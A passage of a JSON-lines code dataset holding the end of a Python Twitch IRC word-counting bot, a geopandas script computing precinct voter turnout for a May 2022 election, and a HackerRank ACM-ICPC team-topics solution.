'cmd_'+command\n\t\t\telse:\n\t\t\t\tmethod = 'cmd_'+command\n\n\t\t\tif hasattr(self, method):\n\t\t\t\ttry:\n\t\t\t\t\tcmd = getattr(self, method)\n\n\t\t\t\t\tmin_argc = max_argc = cmd.__code__.co_argcount - 2\n\t\t\t\t\tif cmd.__defaults__:\n\t\t\t\t\t\tmin_argc -= len(cmd.__defaults__)\n\t\t\t\t\tif cmd.__code__.co_flags & 0x4:\n\t\t\t\t\t\tmax_argc = None\n\n\t\t\t\t\targc = len(args)\n\t\t\t\t\tif max_argc is not None and argc > max_argc:\n\t\t\t\t\t\tself.answer(event,\n\t\t\t\t\t\t\t'@%s: Too many arguments. !%s takes no more than %d argument(s).' %\n\t\t\t\t\t\t\t(sender, command, max_argc))\n\n\t\t\t\t\telif argc < min_argc:\n\t\t\t\t\t\tself.answer(event,\n\t\t\t\t\t\t\t'@%s: Not enough arguments. !%s takes at least %d argument(s).' %\n\t\t\t\t\t\t\t(sender, command, min_argc))\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tcmd(event, *args)\n\n\t\t\t\texcept Exception as exc:\n\t\t\t\t\tif isinstance(exc, EXIT_EXCS):\n\t\t\t\t\t\traise\n\n\t\t\t\t\ttraceback.print_exc()\n\n\t\t\t\t\tself.chunked_privmsg(self.home_channel,\n\t\t\t\t\t\t'Error processing command !%s in channel %s performed by %s: %s' %\n\t\t\t\t\t\t(command, channel, sender, exc))\n\n\t\telse:\n\t\t\ttimestamp = timegm(gmtime())\n\t\t\twords = WORDS.findall(message)\n\t\t\tif words:\n\t\t\t\tcounts = self.channel_data[channel].counts\n\t\t\t\tfor word in words:\n\t\t\t\t\tcounts.append((sender, normalize(word), timestamp))\n\n\t\t\t\tif not self.gc_scheduled:\n\t\t\t\t\tself.schedule_gc()\n\n\tdef is_allowed(self, user, channel):\n\t\tif user in self.admins:\n\t\t\treturn True\n\n\t\tif channel is None:\n\t\t\treturn False\n\n\t\tchan = self.channels[channel]\n\t\treturn chan.is_oper(user) or chan.is_admin(user) or chan.is_owner(user)\n\n\tdef cmd_countperiod(self, event, *time):\n\t\t\"\"\"\n\t\t\tGet or set the period in which words are counted for this channel.\n\t\t\tThe time can be given in hours, seconds or minutes, e.g.: 1h, 5min, 300sec, or 5m 30s\n\t\t\"\"\"\n\t\tsender = event.source.nick\n\t\tchannel = event.target\n\t\tif self.is_allowed(sender, channel):\n\t\t\tdata = self.channel_data[event.target]\n\t\t\tif not time:\n\t\t\t\tself.answer(event, \"@%s: count period = %s\" % (sender, format_time(data.period)))\n\t\t\telse:\n\t\t\t\ttime = ' '.join(time)\n\t\t\t\ttry:\n\t\t\t\t\tseconds = parse_time(time)\n\t\t\t\texcept ValueError as ex:\n\t\t\t\t\tself.answer(event, \"@%s: Illegal count period: %s\" % (sender, time))\n\t\t\t\telse:\n\t\t\t\t\tdata.period = seconds\n\t\t\t\t\tself.answer(event, \"@%s: Changed count period to %s\" % (sender, format_time(data.period)))\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tdef cmd_count(self, event, *words):\n\t\t\"\"\"\n\t\t\tCount given words or if none given all words.\n\t\t\tEvery word is only counted once per user.\n\t\t\"\"\"\n\t\ttimestamp = timegm(gmtime())\n\t\tchannel = event.target\n\t\tdata = self.channel_data[channel]\n\t\tperiodts = timestamp - data.period\n\t\tchannel_counts = data.counts\n\t\tall_user_words = defaultdict(set)\n\n\t\tif words:\n\t\t\tword_counts = dict((normalize(word), 0) for word in words)\n\t\t\tfor user, word, timestamp in reversed(channel_counts):\n\t\t\t\tif timestamp < periodts:\n\t\t\t\t\tbreak\n\n\t\t\t\tif word in word_counts:\n\t\t\t\t\tuser_words = all_user_words[user]\n\t\t\t\t\tif word not in user_words:\n\t\t\t\t\t\tword_counts[word] += 1\n\t\t\t\t\t\tuser_words.add(word)\n\n\t\t\t# de-normalize counted words\n\t\t\tword_counts = dict((word, word_counts[normalize(word)]) for word in words)\n\t\telse:\n\t\t\tword_counts = defaultdict(int)\n\t\t\tfor user, word, timestamp in reversed(channel_counts):\n\t\t\t\tif timestamp < periodts:\n\t\t\t\t\tbreak\n\n\t\t\t\tuser_words = all_user_words[user]\n\t\t\t\tif word not in user_words:\n\t\t\t\t\tword_counts[word] += 1\n\t\t\t\t\tuser_words.add(word)\n\n\t\tself.report_counts(event, word_counts)\n\n\tdef cmd_countint(self, event, minint=None, maxint=None):\n\t\t\"\"\"\n\t\t\tCount integer numbers.\n\t\t\tEvery number is only counted once per user.\n\t\t\"\"\"\n\t\ttimestamp = timegm(gmtime())\n\t\tchannel = event.target\n\t\tdata = self.channel_data[channel]\n\t\tminint = parse_int_bound(minint) if minint is not None else data.minint\n\t\tmaxint = parse_int_bound(maxint) if maxint is not None else data.maxint\n\t\tperiodts = timestamp - data.period\n\t\tchannel_counts = data.counts\n\t\tall_user_words = defaultdict(set)\n\n\t\tword_counts = defaultdict(int)\n\t\tfor user, word, timestamp in reversed(channel_counts):\n\t\t\tif timestamp < periodts:\n\t\t\t\tbreak\n\n\t\t\ttry:\n\t\t\t\tnum = int(word, 10)\n\t\t\texcept ValueError:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tuser_words = all_user_words[user]\n\t\t\t\tif minint is not None and num < minint:\n\t\t\t\t\tpass\n\t\t\t\telif maxint is not None and num > maxint:\n\t\t\t\t\tpass\n\t\t\t\telif num not in user_words:\n\t\t\t\t\tword_counts[num] += 1\n\t\t\t\t\tuser_words.add(num)\n\n\t\tself.report_counts(event, word_counts)\n\n\tcmd_countinit = cmd_countint\n\tcmd_intcount = cmd_countint\n\tcmd_initcount = cmd_countint\n\n\tdef cmd_count1(self, event):\n\t\t\"\"\"\n\t\t\tCount all one-letter words.\n\t\t\tEvery word is only counted once per user.\n\t\t\"\"\"\n\t\ttimestamp = timegm(gmtime())\n\t\tchannel = event.target\n\t\tdata = self.channel_data[channel]\n\t\tperiodts = timestamp - data.period\n\t\tchannel_counts = data.counts\n\t\tall_user_words = defaultdict(set)\n\n\t\tword_counts = defaultdict(int)\n\t\tfor user, word, timestamp in reversed(channel_counts):\n\t\t\tif timestamp < periodts:\n\t\t\t\tbreak\n\n\t\t\tif len(word) == 1:\n\t\t\t\tuser_words = all_user_words[user]\n\t\t\t\tif not word in user_words:\n\t\t\t\t\tword_counts[word] += 1\n\t\t\t\t\tuser_words.add(word)\n\n\t\tself.report_counts(event, word_counts)\n\n\tdef cmd_clearcount(self, event):\n\t\t\"\"\"\n\t\t\tClear all counts of this channel. Only allowed for operators etc.\n\t\t\"\"\"\n\t\tsender = event.source.nick\n\t\tchannel = event.target\n\t\tif self.is_allowed(sender, channel):\n\t\t\tdata = self.channel_data[channel]\n\t\t\trowcount = len(data.counts)\n\t\t\tdel data.counts[:]\n\t\t\tself.answer(event, 'Deleted %d rows.' % rowcount if rowcount != 1 else 'Deleted 1 row.')\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tdef cmd_countminint(self, event, value=None):\n\t\t\"\"\"\n\t\t\tGet or set channel default minimum integer for !countint.\n\t\t\"\"\"\n\t\tsender = event.source.nick\n\t\tchannel = event.target\n\t\tdata = self.channel_data[channel]\n\t\tif value is None:\n\t\t\tself.answer(event, \"@%s: !countint minimum is %s.\" % (sender, data.minint if data.minint is not None else 'unbounded'))\n\t\telif self.is_allowed(sender, channel):\n\t\t\tdata.minint = parse_int_bound(value)\n\t\t\tself.answer(event, \"@%s: Changed !countint minimum to %s\" % (sender, data.minint if data.minint is not None else 'unbounded'))\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tcmd_countintmin = cmd_countminint\n\n\tdef cmd_countmaxint(self, event, value=None):\n\t\t\"\"\"\n\t\t\tGet or set channel default maximum integer for !countint.\n\t\t\"\"\"\n\t\tsender = event.source.nick\n\t\tchannel = event.target\n\t\tdata = self.channel_data[channel]\n\t\tif value is None:\n\t\t\tself.answer(event, \"@%s: !countint maximum is %s.\" % (sender, data.maxint if data.maxint is not None else 'unbounded'))\n\t\telif self.is_allowed(sender, channel):\n\t\t\tdata.maxint = parse_int_bound(value)\n\t\t\tself.answer(event, \"@%s: Changed !countint maximum to %s\" % (sender, data.maxint if data.maxint is not None else 'unbounded'))\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tcmd_countintmax = cmd_countmaxint\n\n\tdef cmd_count_result_limit(self, event, value=None):\n\t\t\"\"\"\n\t\t\tGet or set channel default result list entry limit.\n\t\t\"\"\"\n\t\tsender = event.source.nick\n\t\tchannel = event.target\n\t\tdata = self.channel_data[channel]\n\t\tif value is None:\n\t\t\tself.answer(event, \"@%s: Count result list entry limit is %s.\" % (sender, data.result_limit if data.result_limit is not None else 'unlimited'))\n\t\telif self.is_allowed(sender, channel):\n\t\t\tdata.result_limit = parse_int_bound(value)\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tdef cmd_countleave(self, event):\n\t\t\"\"\"\n\t\t\tMake WordCountBot leave this channel. Only allowed for operators of the given channel.\n\t\t\"\"\"\n\t\tself.home_cmd_leave(event, event.target)\n\n\tdef home_cmd_commands(self, event):\n\t\t\"\"\"\n\t\t\tShow the list of commands.\n\t\t\"\"\"\n\t\tchannel_commands = []\n\t\thome_commands = []\n\t\tsender = event.source.nick\n\t\tfor name in dir(self):\n\t\t\tif name.startswith('cmd_'):\n\t\t\t\tif getattr(self, name).__name__ == name:\n\t\t\t\t\t# otherwise its an alias\n\t\t\t\t\tchannel_commands.append('!'+name[4:])\n\n\t\t\telif name.startswith('home_cmd_'):\n\t\t\t\tif getattr(self, name).__name__ == name:\n\t\t\t\t\t# otherwise its an alias\n\t\t\t\t\thome_commands.append('!'+name[9:])\n\n\t\tchannel_commands.sort()\n\t\thome_commands.sort()\n\t\tmessage = '@%s: Commands: %s' % (sender, ', '.join(channel_commands))\n\t\tif self.home_channel is not None:\n\t\t\tmessage += ' %s-only commands: %s' % (self.home_channel, ', '.join(home_commands))\n\t\tself.answer(event, message)\n\n\tdef home_cmd_help(self, event, command=None):\n\t\t\"\"\"\n\t\t\tShow help to given command.\n\t\t\"\"\"\n\t\tsender = event.source.nick\n\t\tif command is None:\n\t\t\tself.answer(event,\n\t\t\t\t\"@%s: type !commands for a list of commands or !help \"\n\t\t\t\t\"for help to !command. For more see: https://github.com/panzi/WordCountBot\" % sender)\n\t\telse:\n\t\t\tchannel = event.target\n\t\t\tif command.startswith('!'):\n\t\t\t\tcommand = command[1:]\n\n\t\t\tif channel == self.home_channel:\n\t\t\t\tmethod = 'home_cmd_'+command\n\t\t\t\tif not hasattr(self, method):\n\t\t\t\t\tmethod = 'cmd_'+command\n\t\t\telse:\n\t\t\t\tmethod = 'cmd_'+command\n\n\t\t\tif hasattr(self, method):\n\t\t\t\tcmd = getattr(self, method)\n\t\t\t\tdoc = cmd.__doc__\n\t\t\t\tusage = ['Usage: !', command]\n\n\t\t\t\tmin_argc = argc = cmd.__code__.co_argcount\n\t\t\t\tif cmd.__defaults__:\n\t\t\t\t\tmin_argc -= len(cmd.__defaults__)\n\n\t\t\t\tvarnames = cmd.__code__.co_varnames\n\t\t\t\tfor i in range(2, min_argc):\n\t\t\t\t\tusage.append(' ')\n\t\t\t\t\tusage.append(varnames[i])\n\n\t\t\t\tfor i in range(min_argc, argc):\n\t\t\t\t\tusage.append(' [')\n\t\t\t\t\tusage.append(varnames[i])\n\t\t\t\t\tusage.append(']')\n\n\t\t\t\tif cmd.__code__.co_flags & 0x4:\n\t\t\t\t\tusage.append(' [')\n\t\t\t\t\tusage.append(varnames[argc])\n\t\t\t\t\tusage.append('...]')\n\n\t\t\t\tself.answer(event, ''.join(usage))\n\t\t\t\tif doc:\n\t\t\t\t\tdoc = doc.lstrip('\\n').rstrip().split('\\n')\n\t\t\t\t\tfirst = doc[0]\n\t\t\t\t\tindent = first[:len(first) - len(first.lstrip())]\n\t\t\t\t\tindent_len = len(indent)\n\t\t\t\t\tfor line in doc:\n\t\t\t\t\t\tif line.startswith(indent):\n\t\t\t\t\t\t\tline = line[indent_len:]\n\t\t\t\t\t\tself.answer(event, line)\n\t\t\telse:\n\t\t\t\tself.answer(event, \"@%s: No such command !%s\" % (sender, command))\n\n\tdef home_cmd_join(self, event, channel):\n\t\t\"\"\"\n\t\t\tMake WordCountBot join the given channel. Only allowed for operators of the given channel.\n\t\t\"\"\"\n\t\tchannel = normalize_channel(channel)\n\t\tsender = event.source.nick\n\t\tif self.is_allowed(sender, channel):\n\t\t\tself.do_join(channel)\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tdef home_cmd_gcinterval(self, event, *value):\n\t\t\"\"\"\n\t\t\tGet or set gcinterval. WordCountBot-admin only.\n\t\t\"\"\"\n\t\tsender = event.source.nick\n\t\tif self.is_allowed(sender, self.home_channel):\n\t\t\tif not value:\n\t\t\t\tself.answer(event, \"@%s: gcinterval = %s\" % (sender, format_time(self.gcinterval)))\n\t\t\telse:\n\t\t\t\tvalue = ' '.join(value)\n\t\t\t\ttry:\n\t\t\t\t\tseconds = parse_time(value)\n\t\t\t\t\tif seconds <= 0:\n\t\t\t\t\t\traise ValueError(value)\n\t\t\t\texcept ValueError as ex:\n\t\t\t\t\tself.answer(event, \"@%s: Illegal gcinterval: %s\" % (sender, value))\n\t\t\t\telse:\n\t\t\t\t\tself.gcinterval = seconds\n\t\t\t\t\tself.answer(event, \"@%s: Changed gcinterval to %s\" % (sender, format_time(self.gcinterval)))\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tdef home_cmd_leave(self, event, channel):\n\t\t\"\"\"\n\t\t\tMake WordCountBot leave the given channel. Only allowed for operators of the given channel.\n\t\t\"\"\"\n\t\tchannel = normalize_channel(channel)\n\t\tsender = event.source.nick\n\t\tif self.is_allowed(sender, channel):\n\t\t\tif channel == self.home_channel:\n\t\t\t\tself.answer(event, \"@%s: Cannot leave home channel.\" % sender)\n\t\t\telse:\n\t\t\t\tself.do_part(channel)\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tdef home_cmd_channels(self, event):\n\t\t\"\"\"\n\t\tList all channels joined by WordCountBot. WordCountBot-admin only.\n\t\t\"\"\"\n\t\tsender = event.source.nick\n\t\tif self.is_allowed(sender, self.home_channel):\n\t\t\tself.answer(event, 'Joined channels: ' + ', '.join(self.channels))\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tdef report_counts(self, event, word_counts):\n\t\tdata = self.channel_data[event.target]\n\t\tperiod = data.period\n\t\tif word_counts:\n\t\t\tresult_limit = data.result_limit\n\t\t\tcounts = list(word_counts.items())\n\t\t\tcounts.sort(key=lambda item: (-item[1], item[0]))\n\t\t\tif result_limit is not None and len(counts) > result_limit:\n\t\t\t\tcounts = counts[:result_limit]\n\t\t\tself.answer(event, 'Word-counts within the last %s: %s' % (\n\t\t\t\tformat_time(period), ' — '.join('%s: %d' % item for item in counts)))\n\t\telse:\n\t\t\tself.answer(event, 'No words counted in the last %s.' % format_time(period))\n\n\tdef answer(self, event, message):\n\t\tchannel = event.target\n\t\tnick = self.connection.get_nickname()\n\t\tif event.source.nick != nick or self.channels[channel].is_oper(nick):\n\t\t\tself.chunked_privmsg(channel, message)\n\t\telse:\n\t\t\tself.connection.execute_delayed(1, lambda: self.chunked_privmsg(channel, message))\n\n\tdef _send_raw(self, bytes):\n\t\tif self.connection.socket is None:\n\t\t\traise ServerNotConnectedError(\"Not connected.\")\n\t\ttry:\n\t\t\tself.connection.socket.send(bytes)\n\t\texcept socket.error:\n\t\t\tself.connection.disconnect(\"Connection reset by peer.\")\n\n\tdef chunked_privmsg(self, channel, message):\n\t\tprint('%s: %s' % (channel, message))\n\t\tmaxlen = self.max_message_length\n\t\tchannel_utf8 = channel.encode('utf-8')\n\t\tif maxlen is not None:\n\t\t\tmaxlen -= len(channel_utf8) + 11 # len(\"PRIVMSG \"+...+\" \"+...+\"\\r\\n\")\n\t\t\tif maxlen <= 0:\n\t\t\t\tmaxlen = 8\n\t\tmessage_utf8 = message.encode('utf-8')\n\t\tN = len(message_utf8)\n\t\tif maxlen and N > maxlen:\n\t\t\tindex = 0\n\t\t\twhile index < N:\n\t\t\t\tnext_index = index + maxlen\n\t\t\t\tif next_index >= N:\n\t\t\t\t\tself._send_raw(b''.join((b'PRIVMSG ',channel_utf8,b' :',message_utf8[index:],b'\\r\\n')))\n\t\t\t\t\tbreak\n\n\t\t\t\tspace_index = None\n\t\t\t\tfor i in range(next_index, index - 1, -1):\n\t\t\t\t\tbyte = message_utf8[i]\n\t\t\t\t\tif byte == 32 or byte == 9:\n\t\t\t\t\t\tspace_index = i\n\t\t\t\t\t\tbreak\n\n\t\t\t\tif space_index is None:\n\t\t\t\t\t# at least don't cut in the middle of a multi-byte sequence\n\t\t\t\t\twhile next_index > index:\n\t\t\t\t\t\tbyte = message_utf8[next_index]\n\t\t\t\t\t\tif byte < 128 or byte >= 192:\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tnext_index -= 1\n\t\t\t\t\tchunk = message_utf8[index:next_index]\n\t\t\t\telse:\n\t\t\t\t\tchunk = message_utf8[index:space_index].rstrip()\n\t\t\t\t\tnext_index = space_index + 1\n\n\t\t\t\tself._send_raw(b''.join((b'PRIVMSG ',channel_utf8,b' :',chunk,b'\\r\\n')))\n\t\t\t\tindex = next_index\n\t\telse:\n\t\t\tself._send_raw(b''.join((b'PRIVMSG ',channel_utf8,b' :',message_utf8,b'\\r\\n')))\n\n\tdef dump(self):\n\t\treturn {\n\t\t\t'version': '1.0',\n\t\t\t'channels': list(self.joined_channels),\n\t\t\t'default_period': self.default_period,\n\t\t\t'gcinterval': self.gcinterval,\n\t\t\t'channel_data': dict(\n\t\t\t\t(channel, self.channel_data[channel].dump())\n\t\t\t\tfor channel in self.channel_data)\n\t\t}\n\n\tdef load(self, state):\n\t\tversion = state['version']\n\t\tif version != '1.0':\n\t\t\traise ValueError('unsupported state version: %s' % version)\n\n\t\tif 'default_period' in state:\n\t\t\tdefault_period = int(state['default_period'])\n\t\t\tif default_period <= 0:\n\t\t\t\traise ValueError('illegal default period: %r' % default_period)\n\t\t\tself.default_period = default_period\n\t\telse:\n\t\t\tdefault_period = self.default_period\n\n\t\tif 'gcinterval' in state:\n\t\t\tgcinterval = int(state['gcinterval'])\n\t\t\tif gcinterval <= 0:\n\t\t\t\traise ValueError('illegal gcinterval: %r' % gcinterval)\n\t\t\tself.gcinterval = gcinterval\n\n\t\tif 'default_minint' in state:\n\t\t\tdefault_minint = state['default_minint']\n\t\t\tif default_minint is not None:\n\t\t\t\tdefault_minint = int(default_minint)\n\t\t\tself.default_minint = default_minint\n\t\telse:\n\t\t\tdefault_minint = self.default_minint\n\n\t\tif 'default_maxint' in state:\n\t\t\tdefault_maxint = state['default_maxint']\n\t\t\tif default_maxint is not None:\n\t\t\t\tdefault_maxint = int(default_maxint)\n\t\t\tself.default_maxint = default_maxint\n\t\telse:\n\t\t\tdefault_maxint = self.default_maxint\n\n\t\tif 'default_result_limit' in state:\n\t\t\tdefault_result_limit = state['default_result_limit']\n\t\t\tif default_result_limit is not None:\n\t\t\t\tdefault_result_limit = int(default_result_limit)\n\t\t\tif default_result_limit < 1:\n\t\t\t\traise ValueError('illegal default_result_limit: %r' % default_result_limit)\n\t\t\tself.default_result_limit = default_result_limit\n\t\telse:\n\t\t\tdefault_result_limit = self.default_result_limit\n\n\t\tif 'channel_data' in state:\n\t\t\tchannel_data = defaultdict(self.make_channel_data)\n\t\t\tfor channel, data in state['channel_data'].items():\n\t\t\t\tperiod = data.get('period', default_period)\n\t\t\t\tminint = data.get('minint', default_minint)\n\t\t\t\tmaxint = data.get('maxint', default_maxint)\n\t\t\t\tresult_limit = data.get('result_limit', default_result_limit)\n\n\t\t\t\trows = data.get('counts')\n\t\t\t\tchannel_counts = []\n\t\t\t\tif rows:\n\t\t\t\t\tfor row in rows:\n\t\t\t\t\t\tif type(row) not in ROW_TYPES or len(row) != 3:\n\t\t\t\t\t\t\traise ValueError('illegal counts-row for channel %s: %r' % (channel, row))\n\n\t\t\t\t\t\tuser, word, timestamp = row\n\n\t\t\t\t\t\tif type(user) is not str or type(word) is not str or type(timestamp) is not int:\n\t\t\t\t\t\t\traise ValueError('illegal counts-row for channel %s: %r' % (channel, row))\n\n\t\t\t\t\t\tchannel_counts.append((user, word, timestamp))\n\n\t\t\t\tchannel_data[channel] = ChannelData(period, minint, maxint, result_limit, channel_counts)\n\t\t\tself.channel_data = channel_data\n\n\t\tif 'channels' in state:\n\t\t\tself.set_join_channels(state['channels'])\n\n\tdef start(self):\n\t\ttry:\n\t\t\tsuper(CounterBot, self).start()\n\t\texcept InterruptedError:\n\t\t\tpass\n\t\tfinally:\n\t\t\tif self.home_channel is not None:\n\t\t\t\tif self.connection.socket:\n\t\t\t\t\tself.chunked_privmsg(self.home_channel, '%s is shutting down.' % self.connection.get_nickname())\n\ndef main(args):\n\timport yaml\n\timport argparse\n\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-c', '--config', default='config.yaml')\n\tparser.add_argument('--env-config', help='read configuration from environment', action='store_true', default=False)\n\topts = parser.parse_args(args)\n\n\tif opts.env_config:\n\t\tconfig = {}\n\t\tfor key in ('host', 'nickname', 'password', 'default_period',\n\t\t 'default_minint', 'default_maxint', 'default_result_limit',\n\t\t 'gcinterval', 'max_message_length', 'state', 'home_channel'):\n\t\t\tenvkey = 'COUNTBOT_'+key.upper()\n\t\t\tvalue = os.getenv(envkey)\n\t\t\tif value:\n\t\t\t\tconfig[key] = value\n\n\t\tfor key in ('channels', 'admins', 'ignore'):\n\t\t\tenvkey = 'COUNTBOT_'+key.upper()\n\t\t\tvalue = os.getenv(envkey)\n\t\t\tif value:\n\t\t\t\tconfig[key] = value.split(',')\n\telse:\n\t\twith open(opts.config,'rb') as fp:\n\t\t\tconfig = yaml.load(fp)\n\n\tserver, port = config.get('host','irc.twitch.tv:6667').split(':', 1)\n\tport = int(port)\n\n\tstatefile = config.get('state')\n\tdefault_minint = config.get('default_minint')\n\tdefault_maxint = config.get('default_maxint')\n\tdefault_result_limit = config.get('default_result_limit')\n\n\tbot = CounterBot(\n\t\tconfig.get('home_channel'),\n\t\tint(config.get('default_period', 60 * 5)),\n\t\tint(config.get('gcinterval', 60 * 10)),\n\t\tint(config.get('max_message_length', 512)),\n\t\tint(default_minint) if default_minint is not None else None,\n\t\tint(default_maxint) if default_maxint is not None else None,\n\t\tint(default_result_limit) if default_result_limit is not None else None,\n\t\tconfig.get('admins') or [],\n\t\tconfig.get('ignore') or [],\n\t\tconfig['nickname'],\n\t\tconfig.get('channels') or [],\n\t\tconfig.get('password'),\n\t\tserver,\n\t\tport)\n\n\tshutdown = lambda signum, frame: bot.disconnect()\n\tsignal.signal(signal.SIGINT, shutdown)\n\tsignal.signal(signal.SIGTERM, shutdown)\n\n\tconfig = parser = opts = None\n\n\tif statefile:\n\t\ttry:\n\t\t\twith open(statefile, 'r') as fp:\n\t\t\t\tprint('Loading state from %s...' % statefile)\n\t\t\t\tstate = yaml.load(fp)\n\t\texcept FileNotFoundError:\n\t\t\tpass\n\t\telse:\n\t\t\tbot.load(state)\n\t\t\tstate = fp = None\n\n\ttry:\n\t\tprint('Starting bot...')\n\t\tbot.start()\n\tfinally:\n\t\tif statefile:\n\t\t\tprint('\\nDumping state to %s...' % statefile)\n\t\t\tstate = bot.dump()\n\n\t\t\twith open(statefile, 'w') as fp:\n\t\t\t\tyaml.dump(state, fp)\n\nif __name__ == '__main__':\n\timport sys\n\n\ttry:\n\t\tmain(sys.argv[1:])\n\texcept KeyboardInterrupt:\n\t\tprint()\n","sub_path":"countbot.py","file_name":"countbot.py","file_ext":"py","file_size_in_byte":26815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"12136752","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 3 22:58:58 2022\n\n@author: charliehenry\n\"\"\"\n\nimport pandas as pd\nimport geopandas as gpd\n\nprecincts = gpd.read_file(\"precincts_2022.geojson\")\n\nmail_data = pd.read_excel(\"05.03.22Rosters/05.03.22ByMail.xlsx\", header=3)\n\nearly_data = pd.read_excel(\"05.03.22Rosters/05.03.22EarlyVote.xlsx\", header=3)\n\nregistration = pd.read_csv(\"may-3-22-reg.csv\")\n\n\nmail_data = mail_data.pivot_table(index=\"Precinct\", values=\"VUID\", aggfunc=\"count\")\nmail_data = mail_data.rename(columns={\"VUID\": \"Mail-in Votes\"})\n\nearly_data = early_data.pivot_table(index=\"PCT\", values=\"VUID\", aggfunc=\"count\")\nearly_data = early_data.rename(columns={\"VUID\": \"Early Votes\"})\n\nprecincts[\"Precinct\"] = precincts[\"Precinct\"].astype(int)\nprecincts = precincts.merge(\n mail_data, left_on=\"Precinct\", right_on=\"Precinct\", how=\"left\"\n)\nprecincts = precincts.merge(early_data, left_on=\"Precinct\", right_on=\"PCT\", how=\"left\")\nprecincts = precincts.merge(\n registration, left_on=\"Precinct\", right_on=\"Precinct\", how=\"left\"\n)\n\n\nprecincts[\"Early Votes\"] = precincts[\"Early Votes\"].fillna(0)\nprecincts[\"Mail-in Votes\"] = precincts[\"Mail-in Votes\"].fillna(0)\nprecincts[\"Active\"] = precincts[\"Active\"].fillna(0)\nprecincts[\"Suspense\"] = precincts[\"Suspense\"].fillna(0)\nprecincts[\"Total\"] = precincts[\"Total\"].fillna(0)\n\n\nprecincts[\"Total Votes\"] = precincts[\"Mail-in Votes\"] + precincts[\"Early Votes\"]\nprecincts[\"Turnout\"] = precincts[\"Total Votes\"] / precincts[\"VoterCount\"]\n\nprecincts.to_file(\"may-3-22 turnout.geojson\")\n\n\npast_data = gpd.read_file(\"Travis County Turnout.geojson\")\n","sub_path":"maps/May-22 Early Vote.py","file_name":"May-22 Early Vote.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"438499229","text":"\"\"\"\nYou are given a list of people who are attending ACM-ICPC World Finals. Each of them are either well versed in a topic or they are not.\nFind out the maximum number of topics a 2-person team can know. And also find out how many teams can know that maximum number of topics.\n\nNote Suppose a, b, and c are three different people, then (a,b) and (b,c) are counted as two different teams.\n\nInput Format\n\nThe first line contains two integers, N and M, separated by a single space, where N represents the number of people, and M represents the number of topics. lines follow.\nEach line contains a binary string of length . If the th line's th character is , then the th person knows the th topic; otherwise, he doesn't know the topic.\n\nConstraints\n2 <= N <= 500\n1 <= M <= 500\n\nOutput Format\n\nOn the first line, print the maximum number of topics a 2-person team can know.\nOn the second line, print the number of 2-person teams that can know the maximum number of topics.\n\nSample Input\n\n4 5\n10101\n11100\n11010\n00101\n\n\nSample Output\n\n5\n2\n\n\nExplanation\n\n(1, 3) and (3, 4) know all the 5 topics. So the maximal topics a 2-person team knows is 5, and only 2 teams can achieve this.\n\"\"\"\n\nn,m = input().strip().split(' ')\nn,m = [int(n),int(m)]\ntopic = []\ntopic_i = 0\nfor topic_i in range(n):\n topic_t = str(input().strip())\n topic.append(int(topic_t, 2))\nmax_no_of_topics = -1\nmax_teams = 0\nfor people_i in range(n):\n people_j = people_i + 1\n while people_j < n:\n or_int = topic[people_i] | topic[people_j] # gives the max combination of 1s\n or_no_of_topics = bin(or_int).count(\"1\")\n if or_no_of_topics > max_no_of_topics:\n max_no_of_topics = or_no_of_topics\n max_teams = 1\n elif or_no_of_topics == max_no_of_topics:\n max_teams += 1\n people_j += 1\nprint(max_no_of_topics)\nprint(max_teams)","sub_path":"Algorithms/implementation/ACM ICPC.py","file_name":"ACM ICPC.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}